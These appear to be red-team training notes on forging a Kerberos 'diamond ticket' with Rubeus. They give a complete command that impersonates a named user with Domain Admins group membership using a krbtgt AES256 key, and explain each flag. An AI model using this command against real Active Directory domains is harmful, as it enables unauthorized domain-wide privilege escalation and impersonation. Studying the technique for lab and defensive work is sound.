Diamond Tickets

Like a golden ticket, a diamond ticket is a TGT which can be used to access any service as any user.

Create Diamond Ticket

execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe diamond /tgtdeleg /ticketuser:nlamb /ticketuserid:1106 /groups:512 /krbkey:51d7f328ade26e9f785fd7eee191265ebc87c01a4790a7f38fb52e06563d4e7e /nowrap

/tgtdeleg uses the Kerberos GSS-API to obtain a useable TGT for the current user without needing to know their password, NTLM/AES hash, or elevation on the host.

/ticketuser is the username of the user to impersonate.

/ticketuserid is the domain RID of that user.

/groups are the desired group RIDs (512 being Domain Admins).

/krbkey is the krbtgt AES256 hash. (info obtained earlier (KRBTGT secrets))